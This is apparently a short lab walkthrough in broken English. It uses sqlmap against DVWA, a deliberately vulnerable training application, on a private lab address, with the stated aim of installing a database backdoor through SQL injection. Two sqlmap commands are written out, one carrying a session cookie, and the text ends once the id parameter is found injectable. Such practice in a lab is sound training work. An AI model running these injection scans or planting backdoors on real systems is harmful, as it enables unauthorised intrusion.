Now, I will to explain about how to installing backdoor in the database through SQL Injection. For this practice, I try to use DVWA as web application. DVWA is already available web application about SQL Injection and SQL Injection (Blind).
First, I choose SQL Injection as my target. In the user id form, I just type admin and then click submit, but does not happen. Then, I try to copy address (from the site after I submit the admin as user id). I use sqlmap and try this command :
root@bt:/pentest/database/sqlmap# ./sqlmap.py –u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=admin&Submit=Submit"
but, this is failed to get database. Then, I try to use tamper data from browser. From tamper data, I get cookie and copy it. With sqlmap, I try to scan again with this command :
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101
/dvwa/vulnerabilities/sqli/?id=admin&Submit=Submit" --cookie="security=low; PHPSESSID=0pggchrjrb0lj1ttrobmp1ace4"
the result from the command above, I can see the parameter id is vulnerable and might me injectable.